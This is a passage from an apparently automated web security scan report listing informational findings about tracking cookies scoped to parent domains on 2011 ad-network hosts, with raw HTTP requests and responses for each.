Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhK3HSTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIOZLqLDEJccj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KAAzXFWI%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div> <script>
...[SNIP]...

13.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

aud=ABR4nGNgYGDwU30Ry8DAaOgivLqBwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAD3BjOG; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIry6ASTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZJqLDEJcck%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KANnJFP8%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwU30RwcDAaOgiPEuXwYiBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKXIOYgSNzDFFwZR8glM8X6DmHIIrJLnPZgSKwILCn6FyO2EqGSG8HZBbN8DUdkJEdwP4XVDVEpDBBdC%2FMAHcQvESWLiYJVC1yC%2BhdjHxgvmSNyHOFAUTInvA1MCx8GU0DMIVQyhSiBKVMHaeU0hvFUQVx8AC0p4Qaz1BxIAv7IubQ%3D%3D; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1RcR%2FzeeOM3AwGjoIjxLFyTGwCvwvY2JgUGSgeE%2FiOsJpBkZGIEMIGb031XEyMDEcXH6fxCvgeGY%2F64SVAGBb7tRBG4J%2FNDHaZzAD208cuq45b5dxSmXUFGF6qKEihp0gSxUAWFVJzzGTUFVzOAbdiabhYHh7N5msHLJBqA2oHoLIM0IVPMFwhf8PpuZgUFpy36w4FkgDTISYgeQoRSo4sQMN4TRElWz1h5T3JJpVQEg6yEcmKvRrQ87U4HbBJn%2FR%2FBJnibsO%2F9dBYQVhZ0pgDmUAadDA1Wi8YWDAm5Jwe9tzHDj0SUDVWIIO1DW7CIHSFELOCSVgDRQEm4S2MFomhhhaYERmk4YgQlHCciW0y%2FH7dIA3n3Ussf7Swm%2B4JLBLRm4iJlajtDaI4HbHoX9zfhcKEo4WrjqG6jlUjfrc8i5EGYvODeCzFbY347bsf75e%2FFqdrM%2Bi1uz95d0fJJpuCXlDLfglhRWs8TrJmE1PCWH95d8vJoVk78Tjp2gaiZc2Y4BGGTrCGf5MOEMfMnnDR7JDfyEHehmvRC3CW7Wi3BLhvbMxKdzNW7JMOFKfOnoKDGu3o7PhMO4JeNZduNzWAFuyUTLc4RrEvkZfMSU4lJ4U1Y8yx4i6gvVSsKKUu%2FLEnazwiU84eX14jqyCdisYWDgap1ErTIoUEUJT6msooxbUnFZHeEAkfm%2Fn7CiQBVtvPHj9eIG7kzt9eIWbkllAQd86fYZnsy8%2Fj8xDjfA0xJSI6IlpLD%2FGm4T%2BCreUiua%2FfNf4InJWTcJ%2BzXp5CnCiqLfpuK2BgBk%2BzD3; OAID=aa8272d1805895ab786afc266fb574e9

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU30Ry8DAaOgivLqBwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAD3BjOG; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIry6ASTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZJqLDEJcck%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KANnJFP8%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div> <script>
...[SNIP]...

13.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

aud=ABR4nGNgYGDwU32xg4GB0dBFVGAjgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfWJFUEc8R7M4%2F0D5rFKgSnBrxCVOyHamSG8XRCX7YFo74QI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjMFOKjA5DAWgVxiz%2FEIi8gAQDkJzN5; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rc7%2Fm88kc3AwGjoIiqwESTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIBZPqLDEJScq%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacu%2B%2F4xAgbNAGiQp%2Bf8%2FUDWQoRR2JpsFKL63CaxbsoEBJM9oAaRB6r9A%2BIEqTsxwRYyWqJJae0xxS6ZVBYCMh3Cg1mIYH3amArcJMv%2BP4JM8TYzro3GbEHamAOZABpwO9N9VQNgarT0KuK0R%2FN7GDLcGXTJQJYaw8bJmFzlAiprBIakEpIGScJPA0Y%2BmCUgzcVycBuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwAGuycR; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU33RxcDAaOgiEtfAYM3AIKDEAAa9YJLnMoS6Cab4KxsYGhgYmNdAeFVgnmgimCeaABH8C6Y4jMCU2GMwxTUDrFK8AMwTOQdR6Qam%2BMIgKj%2BBKd5vEF4lxMxDYH28fyCOeA%2FmiRWBeaxSYErwK0TlToh2ZghvF8RleyAaOiGC%2ByG8bohKaYjgQojRfGBKoBDiXIirxcTBGoSuQQIEYjsbL5gjcR9CBYIpSScI5QjxkSiYEt8HMfM4mBJ6BqGKIUZvgfBKICpVId40hfBWQTx2ACwo4QVxkj%2BQAADFoDNn; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhLXABJj4BH43sbEwCDJwPAfxPUE0owMjEAGEPMmVFjikuOWfm6KU07ghz5OMwV%2BaOOW%2B3YFt5nfruIxUx2PH0LwmHkKp1xCRSpOOWFVJ5z2MfiEnclmYWA4u7cZLCvZAFQFlLYA0oxABV8gfMHvs5kZGJS27AcLngXSIBMgRgIZSoEqTsxwQxgtUTVr7THFLZlWFQCyHsKBORLd%2BrAzFbhNkPl%2FBJ%2FkacK%2B899VQFhR2JkCmEMZcDo0UCUaXzgo4JYU%2FN7GDDceXTJQJYawA2XNLnKAFLWAQ1IJSAMl4SaBHYymCUgzcVycDuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcEXXDK4JQMXMVPLEVp7JHDbo7C%2FGZ8LRQlHC1d9A7Vc6mZ9DjkXwuwF50aQ2Qr723E71j9%2FL17NbtZncWv2%2FpKOTzINt6Sc4RbcksJqlnjdJKyGp%2BTw%2FpKPV3POyZnAgDQFByCDYvJ3wlEVVM2EKw8yAMNvHeH8HyacgS8tvcEjuYGfsAPdrBfiNsHNehFuydCemfh0rsYtGSZciS9RHSXG1dvxmXAYt2Q8y258DivALZloeY5wtSI%2Fg4%2BYIl0KbzKLZ9lDROWhWklYUep9WcJuVriEJ7y8XlxHNgGbNQwMXK2TqFUgBaoo4SmiVZRxSyouqyMcIDL%2F9xNWFKiijTd%2BvF7cwJ2pvV7cwi2pLOCAL90%2Bw5OZ1%2F8nxuEGeJpFakQ0ixT2X8NtAl%2FFW2pFs3%2F%2BCzwxOesmYb8CABGbFR8%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU32xg4GB0dBFVGAjgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfWJFUEc8R7M4%2F0D5rFKgSnBrxCVOyHamSG8XRCX7YFo74QI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjMFOKjA5DAWgVxiz%2FEIi8gAQDkJzN5; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rc7%2Fm88kc3AwGjoIiqwESTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIBZPqLDEJScq%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacu%2B%2F4xAgbNAGiQp%2Bf8%2FUDWQoRR2JpsFKL63CaxbsoEBJM9oAaRB6r9A%2BIEqTsxwRYyWqJJae0xxS6ZVBYCMh3Cg1mIYH3amArcJMv%2BP4JM8TYzro3GbEHamAOZABpwO9N9VQNgarT0KuK0R%2FN7GDLcGXTJQJYaw8bJmFzlAiprBIakEpIGScJPA0Y%2BmCUgzcVycBuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwAGuycR; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div> <script>
...[SNIP]...

13.37. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 13-Jul-2012 18:37:29 GMT; Path=/
pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; Domain=.contextweb.com; Expires=Wed, 18-Jul-2012 18:37:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=2814750682866683&rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=ffffffffffffffff HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; V=8vciuQJMXXJY; cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B08%2F12%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 13-Jul-2012 18:37:29 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; Domain=.contextweb.com; Expires=Wed, 18-Jul-2012 18:37:29 GMT; Path=/
Location: http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb&can=ffffffffffffffff
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Tue, 19 Jul 2011 18:37:28 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

13.38. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ug=rBXKI63Fi2POmD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 21:00:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?pixid=99062281 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bp.specificclick.net

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Set-Cookie: ug=rBXKI63Fi2POmD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 21:00:37 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Tue, 19 Jul 2011 21:00:36 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15
...[SNIP]...

13.39. http://c.atdmt.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.atdmt.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Sat, 04-Feb-2012 14:24:23 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: c.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; MUID=E361C23374E642C998D8ABA7166A75EC; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877:66c2/2b295; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b:d42f8c5/2b295/13d4144a/66c2/4e178c27

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=E361C23374E642C998D8ABA7166A75EC&cb=1cc461f8e7da070
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Sat, 04-Feb-2012 14:24:23 GMT; path=/;
Date: Tue, 19 Jul 2011 14:24:23 GMT
Content-Length: 0

